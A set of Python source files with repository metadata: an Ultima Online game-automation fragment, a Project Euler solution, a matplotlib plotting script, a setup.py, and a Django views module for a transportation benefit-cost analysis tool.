saveProfile(textid, text)
textid = List[int]([3])
text = List[str]([str(gloves3)])
saveProfile(textid, text)
textid = List[int]([4])
text = List[str]([str(tunic4)])
saveProfile(textid, text)
textid = List[int]([5])
text = List[str]([str(legs5)])
saveProfile(textid, text)
#################### REGS #######################################
# Moss
textid = List[int]([6])
text = List[str]([str(moss6)])
saveProfile(textid, text)
#Ash
textid = List[int]([7])
text = List[str]([str(ash7)])
saveProfile(textid, text)
#Root
textid = List[int]([8])
text = List[str]([str(root8)])
saveProfile(textid, text)
#Pearl
textid = List[int]([9])
text = List[str]([str(pearl9)])
saveProfile(textid, text)
#Nightshade
textid = List[int]([10])
text = List[str]([str(shade10)])
saveProfile(textid, text)
#Ginseng
textid = List[int]([11])
text = List[str]([str(ginseng11)])
saveProfile(textid, text)
#garlic
textid = List[int]([12])
text = List[str]([str(garlic12)])
saveProfile(textid, text)
#SpidersSilk
textid = List[int]([13])
text = List[str]([str(silk13)])
saveProfile(textid, text)
#################### Potions ###################################
#explode
textid = List[int]([14])
text = List[str]([str(exp14)])
saveProfile(textid, text)
#Strength
textid = List[int]([15])
text = List[str]([str(str15)])
saveProfile(textid, text)
#Refresh
textid = List[int]([16])
text = List[str]([str(refresh16)])
saveProfile(textid, text)
#Agility
textid = List[int]([17])
text = List[str]([str(agi17)])
saveProfile(textid, text)
#Heal
textid = List[int]([18])
text = List[str]([str(heal18)])
saveProfile(textid, text)
#Cure
textid = List[int]([19])
text = List[str]([str(cure19)])
saveProfile(textid, text)
#################### Bandages ###################################
textid = List[int]([20])
text = List[str]([str(bandages20)])
saveProfile(textid, text)
#################### Petals #####################################
textid = List[int]([23])
text = List[str]([str(0)])
saveProfile(textid, text)
textid = List[int]([24])
text = List[str]([str(arrows24)])
saveProfile(textid, text)
#################### Arrows/Bolts ###############################
textid = List[int]([25])
text = List[str]([str(bolts25)])
saveProfile(textid, text)
Gumps.WaitForGump(989312372, 2000)
#Gumps.SendAction(989312372, withdrawSwitch)
Gumps.SendAdvancedAction(989312372, withdrawSwitch, switch)
def saveProfile(textid, text):
if Gumps.CurrentGump() != 989312372:
tempGump = Gumps.CurrentGump()
Gumps.CloseGump(tempGump)
Mobiles.UseMobile(butlerID)
Gumps.WaitForGump(989312372, 2000)
Gumps.SendAdvancedAction(989312372, saveSwitch, switch, textid, text)
Misc.Pause(randomPause)
dumpBottles()
butler()
|
[
"noreply@github.com"
] |
SaintDismas1.noreply@github.com
|
1c8f449c5acc848b57e4a84f8e91b355a581523f
|
9ae2918854d208780e247e5477b396bc99642ce6
|
/001-010/002.py
|
29bdb561039d50ca0f4d7312f4c3a10302c03eb3
|
[
"MIT"
] |
permissive
|
KKishikawa/project-euler-for-study-code
|
3ff45aadc5886dd8ff800fb3f81e0bffc943d3b8
|
fd46f1ee3211b5daa6d042cc993e55f631c9caac
|
refs/heads/master
| 2020-03-27T13:16:43.863976
| 2018-09-29T19:43:30
| 2018-09-29T19:43:30
| 146,600,216
| 0
| 0
|
MIT
| 2018-09-29T19:43:31
| 2018-08-29T12:58:55
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 135
|
py
|
num1 = 1
num2 = 2
sum = 0
while num2 <= 4_000_000:
if num2 % 2 == 0:
sum += num2
num1, num2 = num2, (num1 + num2)
print(sum)
|
[
"noreply@github.com"
] |
KKishikawa.noreply@github.com
|
ce0bd4c4c561ed183c1da959ce765b324b251aeb
|
aaccadb5c766fa876b27ff6f2ac2a093f1ebb0c6
|
/arm/злые эксперименты/гыгага.py
|
9642b68a27ec65624da66bcc338173ec13cc8cd1
|
[] |
no_license
|
IvanLkt/Project_Copter
|
d1e6e6fcdb657a2b94342fb0be83f45e3385244f
|
db025dcd6ff49b12857ec2de010847a65504d881
|
refs/heads/master
| 2021-06-17T16:04:01.296310
| 2017-05-24T15:28:10
| 2017-05-24T15:28:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
# -*- coding: utf-8 -*-
import pylab
from mpl_toolkits.mplot3d import Axes3D
import numpy
file = open("data.txt", "r")
data = [map(float, line.split("\t")) for line in file]
def makeData():
(x,y,z) = (data[0::3],data[1::3],data[2::3])
return x, y, z
if __name__ == '__main__':
x, y, z = makeData()
fig = pylab.figure()
axes = Axes3D(fig)
axes.plot_trisurf(x, y, z)
pylab.xlim(x.min(), x.max())
pylab.ylim(y.min(), y.max())
pylab.show()
|
[
"noreply@github.com"
] |
IvanLkt.noreply@github.com
|
cba9fbb59dfa10a6e62ead5047d6642ff8fd5631
|
6dfe292a8fe86782108c92dcb4ea9736b3062852
|
/setup.py
|
147a3ec8b2d9dbdc21634cdeff44988e60d9fe2e
|
[] |
no_license
|
goldenberg/mnistified
|
30149568598214a147208c7c217f6eda66df24cb
|
0e30004200c5dca646a91f4701747f157908b851
|
refs/heads/master
| 2020-04-06T04:41:51.375585
| 2017-02-23T01:58:07
| 2017-02-23T01:58:07
| 82,869,415
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 341
|
py
|
from setuptools import setup
def parse_requirements(filename):
with open(filename) as f:
return f.readlines()
setup(
name='mnistified',
packages=['mnistified'],
include_package_data=True,
install_requires=parse_requirements('requirements.txt'),
test_requires=parse_requirements('requirements_test.txt'),
)
|
[
"bgoldenberg@enlitic.com"
] |
bgoldenberg@enlitic.com
|
3e402b27515948d8ca5ba1cbffd6e8d5b25d05d1
|
a3ac8c00caa7f755ede8b9575d876b24a031efdb
|
/web/analysis/views.py
|
7ad2f057287b6a3b55d7ce499fc2ef67f29297c4
|
[] |
no_license
|
pschmied/benefit-cost-analysis
|
0b14e43ccec5de5aa87a06c36c103312d0651465
|
5659570fcc2a3bcc3f559c1e2747e80f4c00216e
|
refs/heads/master
| 2020-12-25T18:18:20.533731
| 2013-04-29T14:39:57
| 2013-04-29T14:39:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43,279
|
py
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response
from psrc.analysis.models import *
from psrc.analysis.calculations import *
from psrc.analysis.forms import *
from django import newforms as forms
from string import join, replace
from datetime import datetime
import csv
def commify(num, separator=','):
"""commify(num, separator) -> string
Return a string representing the number num with separator inserted
for every power of 1000. Separator defaults to a comma.
E.g., commify(1234567) -> '1,234,567'
"""
num = '%.0f' %(num) # just in case we were passed a numeric value
more_to_do = 1
while more_to_do:
(num, more_to_do) = regex.subn(r'\1%s\2' % separator,num)
return num
# Create your views here.
def analysis_router(request, next='main', use_function=True):
"""
router for the application
"""
# sends a redirect back to home if something is wack about the session
#checksession = _check_session(request)
#if not checksession[0]: return checksession[1]
views = {
'main':{'view':main,
'functions':['_update_analysis','_calculate_results']},
'time':{'view':time,
'functions':['_edit_time','_update_time']},
'distance':{'view':distance,
'functions':['_edit_distance','_update_distance']},
'accidents':{'view':accidents,
'functions':['_edit_safety','_update_safety']},
'emissions':{'view':emissions,
'functions':['_edit_emissions','_update_emissions']},
'unreliability':{'view':unreliability,
'functions':['_edit_unreliability','_update_unreliability']},
'main_report':{'view':main_report,
'functions':['_get_main_report']},
'benefit_type_report':{'view':benefit_type_report,
'functions':['_get_benefit_type_report']},
'tod_report':{'view':tod_report,
'functions':['_get_tod_report']},
'user_class_report':{'view':user_class_report,
'functions':['_get_user_class_report']},
'emissions_report':{'view':emissions_report,
'functions':['_get_emissions_report']},
'safety_report':{'view':safety_report,
'functions':['_get_safety_report']},
}
view = views[next]['view']
if use_function and request.method == 'POST':
for v in views:
for f in views[v]['functions']:
if f in request.POST:
view = views[v]['view']
# calls the function specified in the views dict and passes request to it
#if request.method == 'POST' and 'frompage' in request.POST:
# for i in views.keys():
# if i in request.POST:
# next = views[i]
#else:
# next = 'main'
return view(request)
def home(request):
return render_to_response(
'home.html',{
}
)
def main(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
# brand new session
analysis = Analysis()
#save defaults to analysis
analysis.region = Region.objects.get(pk=1)
defaults = {}
defaults_temp = Default.objects.all().values()
for i in defaults_temp:
defaults[i['field']] = i['value']
for i in Analysis._meta.fields:
if defaults.has_key(i.name):
setattr(analysis,i.name, defaults[i.name])
analysis.save()
request.session['analysis_id'] = analysis.id
#save tod defaults
tod_defaults = TODDefault.objects.all().values()
for i in tod_defaults:
analysis_tod = AnalysisTOD()
analysis_tod.analysis = analysis
for j in TODDefault._meta.fields:
if j.name != 'id':
setattr(analysis_tod, j.name, i[j.name])
analysis_tod.save()
#save accident defaults
accident_defaults = AccidentDefault.objects.all().values()
for i in accident_defaults:
accident_input = AccidentInput()
accident_input.analysis = analysis
for j in AccidentDefault._meta.fields:
if j.name != 'id':
setattr(accident_input, j.name, i[j.name])
accident_input.save()
#accident_value_defaults = AccidentValueDefault.objects.all().values()
#for i in accident_value_defaults:
# accident_value_input = AccidentValueInput()
# accident_value_input.analysis = analysis
# accident_value_input.property_damage_only =
# accident_value_input.injury =
# accident_value_input.fatality =
#save emission defaults
emission_defaults = EmissionDefault.objects.all().values()
for i in emission_defaults:
emission_input = EmissionInput()
emission_input.analysis = analysis
for j in EmissionDefault._meta.fields:
if j.name != 'id':
if j.name == 'pollutant':
setattr(emission_input, 'pollutant_id', i['pollutant_id'])
else:
setattr(emission_input, j.name, i[j.name])
emission_input.save()
pollutants = Pollutant.objects.all()
for i in pollutants:
emission_cost_input = EmissionCostInput()
emission_cost_input.analysis = analysis
emission_cost_input.pollutant = i
emission_cost_input.cost = i.cost
emission_cost_input.save()
# get household from session household_id
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
analysis_dict = analysis.__dict__
if analysis_dict['out_year']:
analysis_dict['scenario'] = "%s_%s_%s" %(analysis_dict['scenario'], analysis_dict['scenario'].split('_')[0], analysis_dict['out_year'])
form = AnalysisFormMain(initial=analysis_dict)
updated = False
if (request.method == 'POST' and (
'_update_analysis' in request.POST or
'_calculate_results' in request.POST or
'_edit_time' in request.POST or
'_edit_distance' in request.POST or
'_edit_safety' in request.POST or
'_edit_emissions' in request.POST)):
#validate input
form = AnalysisFormMain(request.POST)
if form.is_valid():
user_scenario = form.cleaned_data['scenario']
user_scenario_spl = user_scenario.split('_')
if len(user_scenario_spl) > 2:
analysis.scenario = user_scenario_spl[0] + '_' + user_scenario_spl[1]
analysis.out_year = int(user_scenario_spl[3][:4])
else:
analysis.scenario = user_scenario
analysis.out_year = None
#analysis.scenario = form.cleaned_data['scenario']
analysis.region = form.cleaned_data['region_id']
analysis.title = form.cleaned_data['title']
analysis.analyst_name = form.cleaned_data['analyst_name']
analysis.inflation_rate = form.cleaned_data['inflation_rate']
analysis.fraction_of_base = form.cleaned_data['fraction_of_base']
analysis.real_discount_rate = form.cleaned_data['real_discount_rate']
analysis.growth_rate = form.cleaned_data['growth_rate']
#analysis.out_year = form.cleaned_data['out_year']
analysis.end_year = form.cleaned_data['end_year']
analysis.save()
updated = True
if '_calculate_results' in request.POST:
#run calcs
calc_basic(analysis.id)
calc_emissions(analysis.id)
calc_accidents(analysis.id)
if analysis.out_year:
calc_basic(analysis.id, dynamic=1)
calc_emissions(analysis.id, dynamic=1)
calc_accidents(analysis.id, dynamic=1)
interpolate(analysis.id)
if analysis.region.id != 1:
calc_basic(analysis.id, all_regions = 0)
if analysis.out_year:
calc_basic(analysis.id, all_regions = 0)
return analysis_router(request, next='main_report', use_function=False)
elif '_edit_time' in request.POST:
return analysis_router(request, next='time')
elif '_edit_distance' in request.POST:
return analysis_router(request, next='distance')
elif '_edit_safety' in request.POST:
return analysis_router(request, next='accidents')
elif '_edit_emissions' in request.POST:
return analysis_router(request, next='emissions')
return render_to_response(
'main.html',{
'form':form,
'updated':updated,
}
)
def time(request):
#analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
#form = TimeForm(initial=analysis.__dict__)
#updated = False
#if (request.method == 'POST' and ('_update_time' in request.POST)):
# #validate input
# form = TimeForm(request.POST)
# if form.is_valid():
# analysis.hbw_drive_income_1 = form.cleaned_data['hbw_drive_income_1']
# analysis.hbw_drive_income_2 = form.cleaned_data['hbw_drive_income_2']
# analysis.hbw_drive_income_3 = form.cleaned_data['hbw_drive_income_3']
# analysis.hbw_drive_income_4 = form.cleaned_data['hbw_drive_income_4']
# analysis.other_driving = form.cleaned_data['other_driving']
# analysis.sr2_income_am = form.cleaned_data['sr2_income_am']
# analysis.sr2_income_md = form.cleaned_data['sr2_income_md']
# analysis.sr2_income_pm = form.cleaned_data['sr2_income_pm']
# analysis.sr2_income_ev = form.cleaned_data['sr2_income_ev']
# analysis.sr2_income_nt = form.cleaned_data['sr2_income_nt']
# analysis.sr3_income_am = form.cleaned_data['sr3_income_am']
# analysis.sr3_income_md = form.cleaned_data['sr3_income_md']
# analysis.sr3_income_pm = form.cleaned_data['sr3_income_pm']
# analysis.sr3_income_ev = form.cleaned_data['sr3_income_ev']
# analysis.sr3_income_nt = form.cleaned_data['sr3_income_nt']
# analysis.vanpool_income_am = form.cleaned_data['vanpool_income_am']
# analysis.vanpool_income_md = form.cleaned_data['vanpool_income_md']
# analysis.vanpool_income_pm = form.cleaned_data['vanpool_income_pm']
# analysis.vanpool_income_ev = form.cleaned_data['vanpool_income_ev']
# analysis.vanpool_income_nt = form.cleaned_data['vanpool_income_nt']
# analysis.hbw_transit_ivt_income_1 = form.cleaned_data['hbw_transit_ivt_income_1']
# analysis.hbw_transit_ivt_income_2 = form.cleaned_data['hbw_transit_ivt_income_2']
# analysis.hbw_transit_ivt_income_3 = form.cleaned_data['hbw_transit_ivt_income_3']
# analysis.hbw_transit_ivt_income_4 = form.cleaned_data['hbw_transit_ivt_income_4']
# analysis.hbw_transit_walk_income_1 = form.cleaned_data['hbw_transit_walk_income_1']
# analysis.hbw_transit_walk_income_2 = form.cleaned_data['hbw_transit_walk_income_2']
# analysis.hbw_transit_walk_income_3 = form.cleaned_data['hbw_transit_walk_income_3']
# analysis.hbw_transit_walk_income_4 = form.cleaned_data['hbw_transit_walk_income_4']
# analysis.hbw_transit_wait_income_1 = form.cleaned_data['hbw_transit_wait_income_1']
# analysis.hbw_transit_wait_income_2 = form.cleaned_data['hbw_transit_wait_income_2']
# analysis.hbw_transit_wait_income_3 = form.cleaned_data['hbw_transit_wait_income_3']
# analysis.hbw_transit_wait_income_4 = form.cleaned_data['hbw_transit_wait_income_4']
# analysis.other_transit_ivt = form.cleaned_data['other_transit_ivt']
# analysis.other_transit_walk = form.cleaned_data['other_transit_walk']
# analysis.other_transit_wait = form.cleaned_data['other_transit_wait']
# analysis.light_trucks_time = form.cleaned_data['light_trucks_time']
# analysis.medium_trucks_time = form.cleaned_data['medium_trucks_time']
# analysis.heavy_trucks_time = form.cleaned_data['heavy_trucks_time']
# analysis.bike_time = form.cleaned_data['bike_time']
# analysis.walk_time = form.cleaned_data['walk_time']
# analysis.save()
# updated = True
# return analysis_router(request, next='main', use_function=False)
#
#return render_to_response(
# 'time.html',{
# 'form':form,
# 'updated':updated,
# }
#)
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
toddefaults = TODDefault.objects.all()
toddefault_dict = {}
for i in toddefaults.values():
toddefault_dict[i['field']] = i
field_list = toddefault_dict.keys()
analysis_tod = AnalysisTOD.objects.filter(analysis=analysis)
analysis_tod_dict = {}
for result in analysis_tod.values():
analysis_tod_dict[result['field']] = result
dynamic_fields = {}
for field in analysis_tod_dict.keys():
for tod in analysis_tod_dict[field].keys():
if tod not in ('id','field','analysis_id'):
dynamic_fields['%s_%s' %(field,tod)] = analysis_tod_dict[field][tod]
form = TimeForm(obj=dynamic_fields, field_list=field_list)
updated = False
if (request.method == 'POST' and ('_update_time' in request.POST)):
#validate input
form = TimeForm(obj=request.POST, field_list=field_list)
if form.is_valid():
#save changes
for i in analysis_tod:
for tod in analysis_tod_dict[i.field].keys():
if tod not in ('id','field','analysis_id'):
setattr(i, tod, form.cleaned_data['%s_%s' %(i.field, tod)])
i.save()
return analysis_router(request, next='main', use_function=False)
form_rows = []
fields = analysis_tod_dict.keys()
fields.sort()
for field in fields:
temp = {}
temp['field'] = toddefault_dict[field]['name']
for tod in analysis_tod_dict[field].keys():
if tod not in ('id','field','analysis_id'):
temp[tod] = form['%s_%s' %(field, tod)]
form_rows.append(temp)
return render_to_response(
'time.html',{
'form':form,
'form_rows': form_rows,
'updated':updated,
}
)
def distance(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
form = DistanceForm(initial=analysis.__dict__)
updated = False
if (request.method == 'POST' and ('_update_distance' in request.POST)):
#validate input
form = DistanceForm(request.POST)
if form.is_valid():
analysis.auto_cost = form.cleaned_data['auto_cost']
analysis.light_trucks_cost = form.cleaned_data['light_trucks_cost']
analysis.medium_trucks_cost = form.cleaned_data['medium_trucks_cost']
analysis.heavy_trucks_cost = form.cleaned_data['heavy_trucks_cost']
analysis.save()
updated = True
return analysis_router(request, next='main', use_function=False)
return render_to_response(
'distance.html',{
'form':form,
'updated':updated,
}
)
def unreliability(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
form = UnreliabilityForm(initial=analysis.__dict__)
updated = False
if (request.method == 'POST' and ('_update_unreliability' in request.POST)):
#validate input
form = UnreliabilityForm(request.POST)
if form.is_valid():
analysis.i_ratio = form.cleaned_data['i_ratio']
analysis.personal_discount_rate = form.cleaned_data['personal_discount_rate']
analysis.prob_not_meet_guar = form.cleaned_data['prob_not_meet_guar']
analysis.alpha = form.cleaned_data['alpha']
analysis.beta_1 = form.cleaned_data['beta_1']
analysis.beta_2 = form.cleaned_data['beta_2']
analysis.save()
updated = True
return analysis_router(request, next='main', use_function=False)
return render_to_response(
'unreliability.html',{
'form':form,
'updated':updated,
}
)
def accidents(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
accidents = AccidentInput.objects.filter(analysis=analysis)
acc_dict = {}
for result in accidents.values():
if not acc_dict.has_key(result['vc_range']):
acc_dict[result['vc_range']] = {}
acc_dict[result['vc_range']][result['functional_class']] = {}
acc_dict[result['vc_range']][result['functional_class']]['property_damage_only'] = result['property_damage_only']
acc_dict[result['vc_range']][result['functional_class']]['injury'] = result['injury']
acc_dict[result['vc_range']][result['functional_class']]['fatality'] = result['fatality']
dynamic_fields = {}
for vc in vc_range_choices:
for fc in functional_class_choices:
dynamic_fields['property_damage_only_%s_%s' %(vc[0],fc[0])] = acc_dict[vc[0]][fc[0]]['property_damage_only']
dynamic_fields['injury_%s_%s' %(vc[0],fc[0])] = acc_dict[vc[0]][fc[0]]['injury']
dynamic_fields['fatality_%s_%s' %(vc[0],fc[0])] = acc_dict[vc[0]][fc[0]]['fatality']
form = AccidentsForm(obj=dynamic_fields)
updated = False
vc_range = vc_range_choices
fc_classes = functional_class_choices
cost_form = AccidentCostForm(initial=analysis.__dict__)
if (request.method == 'POST' and ('_update_safety' in request.POST)):
#validate input
form = AccidentsForm(obj=request.POST)
cost_form = AccidentCostForm(request.POST)
if form.is_valid() and cost_form.is_valid():
#save changes
for i in accidents:
setattr(i, 'property_damage_only', form.cleaned_data['property_damage_only_%s_%s' %(i.vc_range, i.functional_class)])
setattr(i, 'injury', form.cleaned_data['injury_%s_%s' %(i.vc_range, i.functional_class)])
setattr(i, 'fatality', form.cleaned_data['fatality_%s_%s' %(i.vc_range, i.functional_class)])
i.save()
analysis.property_damage_only = cost_form.cleaned_data['property_damage_only']
analysis.injury = cost_form.cleaned_data['injury']
analysis.fatality = cost_form.cleaned_data['fatality']
analysis.save()
return analysis_router(request, next='main', use_function=False)
form_rows = []
for vc in vc_range:
for fc in fc_classes:
temp = {}
temp['vc'] = vc[0]
temp['fc'] = fc[0]
temp['property_damage_only'] = form['property_damage_only_%s_%s' %(vc[0],fc[0])]
temp['injury'] = form['injury_%s_%s' %(vc[0],fc[0])]
temp['fatality'] = form['fatality_%s_%s' %(vc[0],fc[0])]
form_rows.append(temp)
return render_to_response(
'accidents.html',{
'form':form,
'vc_range':vc_range,
'fc_classes':fc_classes,
'form_rows': form_rows,
'cost_form':cost_form,
'updated':updated,
}
)
def emissions(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
emmissions = EmissionInput.objects.filter(analysis=analysis)
emissions_cost = EmissionCostInput.objects.filter(analysis=analysis)
emm_dict = {}
for result in emmissions.values():
if not emm_dict.has_key(result['pollutant_id']):
emm_dict[result['pollutant_id']] = {}
emm_dict[result['pollutant_id']][result['speed_class']] = result
emm_cost_dict = {}
for result in emissions_cost.values():
emm_cost_dict[result['pollutant_id']] = result
dynamic_fields = {}
for p in emm_dict.keys():
for speed in speed_class_choices:
dynamic_fields['car_%s_%s' %(p,speed[0])] = emm_dict[p][speed[0]]['car']
dynamic_fields['light_truck_%s_%s' %(p,speed[0])] = emm_dict[p][speed[0]]['light_truck']
dynamic_fields['medium_truck_%s_%s' %(p,speed[0])] = emm_dict[p][speed[0]]['medium_truck']
dynamic_fields['heavy_truck_%s_%s' %(p,speed[0])] = emm_dict[p][speed[0]]['heavy_truck']
dynamic_cost_fields = {}
for p in emm_cost_dict.keys():
dynamic_cost_fields['pollutant_%s' %(p)] = emm_cost_dict[p]['cost']
form = EmissionsForm(obj=dynamic_fields)
cost_form = EmissionsCostForm(obj=dynamic_cost_fields)
if (request.method == 'POST' and ('_update_emissions' in request.POST)):
#validate input
form = EmissionsForm(obj=request.POST)
cost_form = EmissionsCostForm(obj=request.POST)
if form.is_valid() and cost_form.is_valid():
#save changes
for i in emmissions:
setattr(i, 'car', form.cleaned_data['car_%s_%s' %(i.pollutant_id, i.speed_class)])
setattr(i, 'light_truck', form.cleaned_data['light_truck_%s_%s' %(i.pollutant_id, i.speed_class)])
setattr(i, 'medium_truck', form.cleaned_data['medium_truck_%s_%s' %(i.pollutant_id, i.speed_class)])
setattr(i, 'heavy_truck', form.cleaned_data['heavy_truck_%s_%s' %(i.pollutant_id, i.speed_class)])
i.save()
for i in emissions_cost:
setattr(i, 'cost', cost_form.cleaned_data['pollutant_%s' %(i.pollutant_id)])
i.save()
return analysis_router(request, next='main', use_function=False)
form_rows = []
for p in emm_dict.keys():
for speed in speed_class_choices:
temp = {}
temp['p'] = Pollutant.objects.get(pk=p).name
temp['speed'] = speed[0]
temp['car'] = form['car_%s_%s' %(p,speed[0])]
temp['light_truck'] = form['light_truck_%s_%s' %(p,speed[0])]
temp['medium_truck'] = form['medium_truck_%s_%s' %(p,speed[0])]
temp['heavy_truck'] = form['heavy_truck_%s_%s' %(p,speed[0])]
form_rows.append(temp)
cost_form_rows = []
for p in emm_cost_dict.keys():
temp = {}
temp['p'] = Pollutant.objects.get(pk=p).name
temp['cost'] = cost_form['pollutant_%s' %(p)]
cost_form_rows.append(temp)
return render_to_response(
'emissions.html',{
'form_rows': form_rows,
'form':form,
'cost_form_rows': cost_form_rows,
'cost_form': cost_form
}
)
def add_region(request):
form = RegionForm()
if request.method == 'POST':
form = RegionForm(request.POST)
if form.is_valid():
newregion = form.save()
newregion.save()
form = 0
return HttpResponseRedirect('/')
return render_to_response(
'region/add.html',{
'form':form
}
)
def main_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
benefit_results = BenefitResult.objects.filter(analysis=analysis)
acct_results = AccountingResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = benefit_results.filter(region=1, tod='all', user_class='all').order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
full_region_results_dict[result['year']] = {'year':result['year']}
full_region_results_dict[result['year']]['user_benefit'] = result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
full_region_acct_raw = acct_results.filter(region=1, tod='all', user_class='all').order_by('year').values()
for result in full_region_acct_raw:
if result['variable'] == 'rev':
full_region_results_dict[result['year']]['toll_revenue'] = result['difference']
elif result['variable'] == 'vmt':
full_region_results_dict[result['year']]['change_vmt'] = result['difference']
elif result['variable'] == 'vht':
full_region_results_dict[result['year']]['change_vht'] = result['difference']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
#calculate full region NPV
full_region_benefit_npv = 0
#full_region_toll_npv = 0
for year in years:
full_region_benefit_npv += full_region_results_dict[year]['user_benefit'] / (1 + analysis.real_discount_rate)**(year - current_year)
#full_region_toll_npv += full_region_results_dict[year]['toll_revenue'] / (1 + analysis.real_discount_rate)**(year - current_year)
#if subregion calculate results and NPV
if analysis.region.id != 1:
subregion_benefits_raw = benefit_results.filter(region=analysis.region.id, tod='all', user_class='all').order_by('year').values()
subregion_results_dict = {}
for result in subregion_benefits_raw:
subregion_results_dict[result['year']] = {'year':result['year']}
subregion_results_dict[result['year']]['user_benefit'] = result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
subregion_acct_raw = acct_results.filter(region=analysis.region.id, tod='all', user_class='all').order_by('year').values()
for result in subregion_acct_raw:
if result['variable'] == 'rev':
subregion_results_dict[result['year']]['toll_revenue'] = result['difference']
elif result['variable'] == 'vmt':
subregion_results_dict[result['year']]['change_vmt'] = result['difference']
elif result['variable'] == 'vht':
subregion_results_dict[result['year']]['change_vht'] = result['difference']
subregion_results = []
years = subregion_results_dict.keys()
years.sort()
for year in years:
subregion_results.append(subregion_results_dict[year])
#calculate full region NPV
subregion_benefit_npv = 0
#subregion_toll_npv = 0
for year in years:
subregion_benefit_npv += subregion_results_dict[year]['user_benefit'] / (1 + analysis.real_discount_rate)**(year - current_year)
#full_region_toll_npv += full_region_results_dict[year]['toll_revenue'] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_results=None
subregion_benefit_npv=0
#get overrides
overrides=[]
defaults = {}
defaults_temp = Default.objects.all().values()
for i in defaults_temp:
defaults[i['field']] = i['value']
for i in Analysis._meta.fields:
if defaults.has_key(i.name):
if analysis.__dict__[i.name] != defaults[i.name]:
overrides.append({'parameter':i.name, 'default':defaults[i.name],'override': analysis.__dict__[i.name]})
return render_to_response(
'main_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
'full_region_benefit_npv': full_region_benefit_npv,
'subregion_results': subregion_results,
'subregion_benefit_npv': subregion_benefit_npv,
'overrides': overrides
}
)
def benefit_type_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
benefit_results = BenefitResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = benefit_results.filter(region=1, tod='all', user_class='all').order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
full_region_results_dict[result['year']] = {'year':result['year']}
full_region_results_dict[result['year']]['time_benefit'] = result['time_benefit']
full_region_results_dict[result['year']]['operating_cost_benefit'] = result['operating_cost_benefit']
full_region_results_dict[result['year']]['toll_benefit'] = result['toll_benefit']
full_region_results_dict[result['year']]['fare_benefit'] = result['fare_benefit']
full_region_results_dict[result['year']]['parking_benefit'] = result['parking_benefit']
full_region_results_dict[result['year']]['unreliability_benefit'] = result['unreliability_benefit']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
#calculate full region NPV
full_region_benefit_npv = {}
#full_region_toll_npv = 0
for year in years:
for key in full_region_results_dict[year].keys():
if not full_region_benefit_npv.has_key(key):
full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
full_region_results.append(full_region_benefit_npv)
if analysis.region.id != 1:
subregion_benefits_raw = benefit_results.filter(region=analysis.region.id, tod='all', user_class='all').order_by('year').values()
subregion_results_dict = {}
for result in subregion_benefits_raw:
subregion_results_dict[result['year']] = {'year':result['year']}
subregion_results_dict[result['year']]['time_benefit'] = result['time_benefit']
subregion_results_dict[result['year']]['operating_cost_benefit'] = result['operating_cost_benefit']
subregion_results_dict[result['year']]['toll_benefit'] = result['toll_benefit']
subregion_results_dict[result['year']]['fare_benefit'] = result['fare_benefit']
subregion_results_dict[result['year']]['parking_benefit'] = result['parking_benefit']
subregion_results_dict[result['year']]['unreliability_benefit'] = result['unreliability_benefit']
subregion_results = []
years = subregion_results_dict.keys()
years.sort()
for year in years:
subregion_results.append(subregion_results_dict[year])
#calculate full region NPV
subregion_benefit_npv = {}
#subregion_toll_npv = 0
for year in years:
if not subregion_benefit_npv.has_key(key):
subregion_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_results=None
subregion_benefit_npv=0
return render_to_response(
'benefit_type_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
'full_region_benefit_npv': full_region_benefit_npv,
'subregion_results': subregion_results,
'subregion_benefit_npv': subregion_benefit_npv
}
)
def tod_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
benefit_results = BenefitResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = benefit_results.filter(region=1, user_class='all').order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
if not full_region_results_dict.has_key(result['year']):
full_region_results_dict[result['year']] = {'year':result['year']}
if not full_region_results_dict[result['year']].has_key(result['tod']):
full_region_results_dict[result['year']][result['tod']] = 0
